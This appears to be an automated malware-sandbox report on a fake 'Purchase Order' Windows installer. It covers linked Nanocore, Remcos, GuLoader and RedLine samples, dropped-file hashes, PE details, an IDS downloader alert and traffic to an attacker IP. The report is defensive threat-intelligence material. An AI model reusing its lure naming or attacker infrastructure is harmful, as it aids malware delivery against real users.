      185.222.57.90 | NK098765434567890-87654345678.exe | malicious | Nanocore |
      185.222.57.90 | NAC0098765434567890-09876.exe | malicious | Nanocore |
      185.222.57.90 | RHK098760045678009000.exe | malicious | Nanocore |
      185.222.57.90 | FHKPO098765432345.exe | malicious | Remcos |

      No context

      Match | Associated Sample Name / URL | Detection | Threat Name | Context
      ROOTLAYERNETNL | 9dOKGgFNL2.exe | malicious | RedLine | 45.137.22.126
      ROOTLAYERNETNL | RFQ List and airflight 2024.pif.exe | malicious | PureLog Stealer | 45.137.22.174
      ROOTLAYERNETNL | Calyciform.exe | malicious | GuLoader | 45.137.22.248
      ROOTLAYERNETNL | I5pvP0CU6M.exe | malicious | RedLine | 45.137.22.248
      ROOTLAYERNETNL | gLsenXDHxP.exe | malicious | RedLine | 185.222.58.240
      ROOTLAYERNETNL | DEVIS + FACTURE.exe | malicious | Remcos, GuLoader | 45.137.22.126
      ROOTLAYERNETNL | PZNfhfaj9O.exe | malicious | RedLine | 185.222.58.80
      ROOTLAYERNETNL | ZxS8mP8uE6.exe | malicious | RedLine | 45.137.22.123
      ROOTLAYERNETNL | nu28HwzQwC.exe | malicious | RedLine | 185.222.58.52

      No context

      Match | Associated Sample Name / URL | Detection | Threat Name | Context
      C:\Users\user\AppData\Local\Temp\nsk59ED.tmp\System.dll | MG-Docu6800001.exe | malicious | GuLoader |
      C:\Users\user\AppData\Local\Temp\nsk59ED.tmp\System.dll | Fac.exe | malicious | GuLoader, Snake Keylogger |
      C:\Users\user\AppData\Local\Temp\nsk59ED.tmp\System.dll | Factura Honorarios 2024-11-17.exe | malicious | GuLoader, Snake Keylogger |
      C:\Users\user\AppData\Local\Temp\nsk59ED.tmp\System.dll | JOSHHHHHH.exe | malicious | GuLoader, Snake Keylogger |
      C:\Users\user\AppData\Local\Temp\nsk59ED.tmp\System.dll | rCEMG242598.exe | malicious | GuLoader, Snake Keylogger |
      C:\Users\user\AppData\Local\Temp\nsk59ED.tmp\System.dll | SBSLMD5qhm.msi | malicious | Metasploit |
      C:\Users\user\AppData\Local\Temp\nsk59ED.tmp\System.dll | mU4lYkmS6K.exe | malicious | CobaltStrike |
      C:\Users\user\AppData\Local\Temp\nsk59ED.tmp\System.dll | SBSLMD5qhm.msi | malicious | Metasploit |
      C:\Users\user\AppData\Local\Temp\nsk59ED.tmp\System.dll | mU4lYkmS6K.exe | malicious | CobaltStrike |
                                          Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):11776
                                          Entropy (8bit):5.890541747176257
                                          Encrypted:false
                                          SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
                                          MD5:75ED96254FBF894E42058062B4B4F0D1
                                          SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
                                          SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
                                          SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 3%
                                          Joe Sandbox View:
                                          • Filename: MG-Docu6800001.exe, Detection: malicious
                                          • Filename: Fac.exe, Detection: malicious
                                          • Filename: Factura Honorarios 2024-11-17.exe, Detection: malicious
                                          • Filename: JOSHHHHHH.exe, Detection: malicious
                                          • Filename: rCEMG242598.exe, Detection: malicious
                                          • Filename: SBSLMD5qhm.msi, Detection: malicious
                                          • Filename: mU4lYkmS6K.exe, Detection: malicious
                                          • Filename: SBSLMD5qhm.msi, Detection: malicious
                                          • Filename: mU4lYkmS6K.exe, Detection: malicious
                                          Reputation:moderate, very likely benign file
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....oZ...........!..... ...........).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...x....@.......(..............@....reloc..~....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):249837
                                          Entropy (8bit):1.2410746997695157
                                          Encrypted:false
                                          SSDEEP:768:d6sbjlB29qJBBoYbES9BCDKXC9HOak6p6MDrQsv8Ajldp8tEcf0TeMhz3CqXuwl7:tf1wx3et4e+lL5WwgzfZTc
                                          MD5:F1A91A75CAAA712680DA4475E1CDA954
                                          SHA1:C341696CBB8AF494821F8D16EA5E30B7827F5393
                                          SHA-256:79C33E51A0D2271F4252D793D8B9BCEF9F1F817FF3E61C94ECC59E615EC68DCE
                                          SHA-512:F43E478ADCCAF2CBD9FF9F2A4F920B63F53A82E028CD5ADFB41896EC04EB626FD15E283CB35D8C4D2A95EA8B5A7E59102A8A306C4DF60375C257A04150616906
                                          Malicious:false
                                          Reputation:low
                                          Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          File Type:TTComp archive data, binary, 4K dictionary
                                          Category:dropped
                                          Size (bytes):40687
                                          Entropy (8bit):4.5997894189869815
                                          Encrypted:false
                                          SSDEEP:384:KydpqkEFLRpyBDIag9EJG15JghsD4q3R3TD/FS0v29Akde6QYqOmN3LIV9re3bef:woFgH1EsM8H/UakYEI7I8LLgk4P
                                          MD5:35D47296CFB14E694BC97D22A92D42A1
                                          SHA1:BD0C529FFF26F900DB7948353F87377A31D0890D
                                          SHA-256:52716A62B0CE128607785167F560D0890D4C79CFEF11E677945720D4B691F858
                                          SHA-512:925F88965A2CF617F060E3A5464B8E601C4C5F963FBD955FE35AD7F72759C72E44742486295F51342DB8633600E5F97FF764E0222DD6B53931F93303F9407BE0
                                          Malicious:false
                                          Reputation:low
                                          Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 600x600, segment length 16, progressive, precision 8, 337x200, components 1
                                          Category:dropped
                                          Size (bytes):5453
                                          Entropy (8bit):7.8833870423876355
                                          Encrypted:false
                                          SSDEEP:96:Jh/2gZ62nmh8h8hMA8cZZ5wq1dJlH999YqYYYSJ9nv79i2+7nllbx0:j+gZ62nypZsqnJlH999Lv7I7a
                                          MD5:1732F2BFFA1308AABB19AA7006DFE151
                                          SHA1:80974B7DC8AFF2267C3502433C9DBDCCE04BD68C
                                          SHA-256:F99C88579EF1BF9BE2A9442D6E0B61BAC01BE74E9EC96A844D3CE0E49E89B889
                                          SHA-512:9DE1E2D1028E9FC4938CA1A4DE274513632319B411E2E1797DAAC80AD1D8C220ABD410612DDA28B6FA58BAD6A591234A675AEA0AE29B0EF75E9776BE91993C1C
                                          Malicious:false
                                          Reputation:low
                                          Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):290718
                                          Entropy (8bit):1.2554775771524807
                                          Encrypted:false
                                          SSDEEP:768:tCp+qklylxDqcoTQYGEujA28gHCxgzdobjCp3zxBMpnz4G+KrbwdmCClgE+JQH0/:+DqcWd2ikx8zkwT0sH7FZJ9dmMg9Fb
                                          MD5:C3ACEFE77EA0A60EFDFBC53EF527E6DD
                                          SHA1:84064B562F74D054254FDC6012E83248F4C10DB2
                                          SHA-256:01AB1D43FD91C8715A0FE5D4D3EA6A4DFD0FF6DCA3BFE95DE026B97DD246260B
                                          SHA-512:01B8D1253A15345F35304860BC91AC0EFE9DFD4AE91022326DD1E509C0CC37BE401DE24AA2096B4C2B17D7B965F904C80ECCDB4157C1FD366FA90226DE198D1E
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):484483
                                          Entropy (8bit):1.2566608257372598
                                          Encrypted:false
                                          SSDEEP:1536:k00wcig7ANvjuzHnVWM5DNgLiOavUv9tkj8:Wwci1O1WABgT92j8
                                          MD5:BDF9F6FA5F7851BD46CFAD3859D1D2CA
                                          SHA1:9352199243642CAD95D4870883238F1E06E3D13D
                                          SHA-256:AF12000C4E3E6C57CE444368D50A3E7F737647C0DECD597AAA307F26C0B1BFBF
                                          SHA-512:A99C33BCB4D65AF35FA970BDB84332FCC7C284C2017F135C81DE28EC4D1867E1F341CB6A0DCD1B254E816DD2D435FC469536F9D8779FB10455BAF6846FE1A625
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):281853
                                          Entropy (8bit):7.7902641113783515
                                          Encrypted:false
                                          SSDEEP:6144:qv8q7vHyznD3c0MG0KXtSYaAzhtG1CDta+0kLbYMLezAL1T8K8P/k:lKfqbcX/ySYaAbG1QJLkMMALNbEs
                                          MD5:63B84085F6C377FCB26E75EBD1F83BE4
                                          SHA1:6E6A61DCD1CB093FAC560085E5DC384E3F5C3E66
                                          SHA-256:B63205EDDA324ADC71C16D51D5C4169CEBA89794FAEAF1D0F5809AAEFF256840
                                          SHA-512:F4F43853270F28C405C4FD386094058A5FB9138D237411C60B08FCD97AE176414F8049A0626FD9F02C7571EBAE200AB5FDB4C20896E873B0FDEE23443EFF815C
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                          Category:modified
                                          Size (bytes):1454
                                          Entropy (8bit):3.192863723268913
                                          Encrypted:false
                                          SSDEEP:24:8+rxWLgD4/BV02Dejq8wKoy+pu8wKoyjC0ee92Fdqy:8u8gDszhee8wKUpu8wKlC0ee9CUy
                                          MD5:55A582437B4B3CC2C714564C6371E738
                                          SHA1:0CF79F478868D1BF1386A00B81838AB2DDCE0D9D
                                          SHA-256:FDF8DBDD977021EDF1373C25FB4EE880DCEF683CE5A1D8447AAC2006E33F242C
                                          SHA-512:46676A6A734F6F90310C046F47B6EFFE2C86A5A82FA986831B0B2CD79E277D7B46A32EE07A7D2570989092872DB1FC4E96A8D3983B2CC6890B1E0780A31D011E
                                          Malicious:false
                                          Preview:L..................F........................................................!....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....\.1...........user.D............................................f.r.o.n.t.d.e.s.k.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....t.1...........Printer Shortcuts.T............................................P.r.i.n.t.e.r. .S.h.o.r.t.c.u.t.s... .t.2...........lensaftalerne.sla.T............................................l.e.n.s.a.f.t.a.l.e.r.n.e...s.l.a... ...[.....\.....\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.P.r.i.n
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.618058158790601
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          File size:724'333 bytes
                                          MD5:b9a03fb0c2c7f23a1e4ccb0d79c5053c
                                          SHA1:4d87c4ed89d8b92f2b6849dc6af6a8850f8e5e7c
                                          SHA256:099369eb025c3e23b6669c872ac2572e7bc4ba9200eb4d6318284983ddb78e3f
                                          SHA512:7b39c7eb08b12f947a2f5fb79f91a7c8fb738fa14c2539db55f207754438f5b340d5ae5219ec1ea6861cb72aad32e04d2b701cc6a34c098e0a780db3607be3d2
                                          SSDEEP:12288:d35ol8MJEBhQRtZZbhhLSbWJgU8UFJ6UibZP9/I7TAWWtQnm:d3kJEBORt7b3Oa2Udi9P9yTB0Qnm
                                          TLSH:46F4E061227BCC66F38492B04556E23D8EA6EEC62971C33757F2EF5BB518F723818211
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...<.oZ.................h.........
                                          Icon Hash:7b3b5a7232162613
                                          Entrypoint:0x40338f
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x5A6FED3C [Tue Jan 30 03:57:48 2018 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:b34f154ec913d2d2c435cbd644e91687
                                          Instruction
                                          sub esp, 000002D4h
                                          push ebx
                                          push esi
                                          push edi
                                          push 00000020h
                                          pop edi
                                          xor ebx, ebx
                                          push 00008001h
                                          mov dword ptr [esp+14h], ebx
                                          mov dword ptr [esp+10h], 0040A2E0h
                                          mov dword ptr [esp+1Ch], ebx
                                          call dword ptr [004080A8h]
                                          call dword ptr [004080A4h]
                                          and eax, BFFFFFFFh
                                          cmp ax, 00000006h
                                          mov dword ptr [00434EECh], eax
                                          je 00007FC474826B63h
                                          push ebx
                                          call 00007FC474829E15h
                                          cmp eax, ebx
                                          je 00007FC474826B59h
                                          push 00000C00h
                                          call eax
                                          mov esi, 004082B0h
                                          push esi
                                          call 00007FC474829D8Fh
                                          push esi
                                          call dword ptr [00408150h]
                                          lea esi, dword ptr [esi+eax+01h]
                                          cmp byte ptr [esi], 00000000h
                                          jne 00007FC474826B3Ch
                                          push 0000000Ah
                                          call 00007FC474829DE8h
                                          push 00000008h
                                          call 00007FC474829DE1h
                                          push 00000006h
                                          mov dword ptr [00434EE4h], eax
                                          call 00007FC474829DD5h
                                          cmp eax, ebx
                                          je 00007FC474826B61h
                                          push 0000001Eh
                                          call eax
                                          test eax, eax
                                          je 00007FC474826B59h
                                          or byte ptr [00434EEFh], 00000040h
                                          push ebp
                                          call dword ptr [00408044h]
                                          push ebx
                                          call dword ptr [004082A0h]
                                          mov dword ptr [00434FB8h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+34h]
                                          push 000002B4h
                                          push eax
                                          push ebx
                                          push 0042B208h
                                          call dword ptr [00408188h]
                                          push 0040A2C8h
                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8608 | 0xa0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x63000 | 0x308e8 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x6627 | 0x6800 | 8c030dfed318c62753a7b0d60218279b | False | 0.6642503004807693 | data | 6.452235553722483 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x8000 | 0x149a | 0x1600 | 966a3835fd2d9407261ae78460c26dcc | False | 0.43803267045454547 | data | 5.007075185851696 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xa000 | 0x2aff8 | 0x600 | 939516377e7577b622eb1ffdc4b5db4a | False | 0.517578125 | data | 4.03532418489749 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x35000 | 0x2e000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x63000 | 0x308e8 | 0x30a00 | f3073287865b6dba616e9c916f34371a | False | 0.4013245099614396 | data | 5.74891499046254 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_BITMAP | 0x633e8 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174 |
| RT_ICON | 0x63750 | 0x10a00 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.25190906954887216 |
| RT_ICON | 0x74150 | 0x9600 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.2941666666666667 |
| RT_ICON | 0x7d750 | 0x7600 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9859970868644068 |
| RT_ICON | 0x84d50 | 0x5600 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.309093386627907 |
| RT_ICON | 0x8a350 | 0x4400 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.35167738970588236 |
| RT_ICON | 0x8e750 | 0x2600 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.38003700657894735 |
| RT_ICON | 0x90d50 | 0x1200 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4377170138888889 |
| RT_ICON | 0x91f50 | 0xa00 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.508203125 |
| RT_ICON | 0x92950 | 0x600 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.4524739583333333 |
| RT_DIALOG | 0x92f50 | 0x144 | data | English | United States | 0.5216049382716049 |
| RT_DIALOG | 0x93098 | 0x13c | data | English | United States | 0.5506329113924051 |
| RT_DIALOG | 0x931d8 | 0x100 | data | English | United States | 0.5234375 |
| RT_DIALOG | 0x932d8 | 0x11c | data | English | United States | 0.6056338028169014 |
| RT_DIALOG | 0x933f8 | 0xc4 | data | English | United States | 0.5918367346938775 |
| RT_DIALOG | 0x934c0 | 0x60 | data | English | United States | 0.7291666666666666 |
| RT_GROUP_ICON | 0x93520 | 0x84 | data | English | United States | 0.7803030303030303 |
| RT_MANIFEST | 0x935a8 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795 |

| DLL | Import |
|---|---|
| KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW |
| USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage |
| GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
| SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW |
| ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
| COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
| ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |
                                          Language of compilation system | Country where language is spoken | Map
                                          English | United States |
                                          Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                          2024-11-18T18:19:35.134009+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 53200 | 185.222.57.90 | 80 | TCP
                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Nov 18, 2024 18:19:36.295378923 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.295738935 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.295937061 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.295950890 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.295979977 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.295991898 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.296031952 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.296122074 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.300328970 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.300425053 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.300437927 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.300498962 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.300542116 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.341192007 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.341263056 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.341339111 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.341368914 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.341394901 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.341430902 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.341470003 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.341528893 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.341528893 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.344232082 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.410474062 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.410510063 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.410521030 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.410649061 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.410757065 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.410768986 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.410782099 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.410797119 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.410859108 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.410859108 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.411092997 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.411117077 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.411147118 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.411179066 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.411408901 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.411432028 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.411482096 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.415617943 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.415669918 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.415682077 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.415740013 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.415775061 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.456722021 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.456805944 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.456857920 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.456895113 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.456928015 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.456949949 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.457077980 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.457108021 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.457145929 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.457180977 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.457185984 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.457277060 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.715174913 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715204954 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715210915 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715322971 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715333939 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715344906 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715354919 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715420008 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.715456963 CET5320080192.168.2.7185.222.57.90
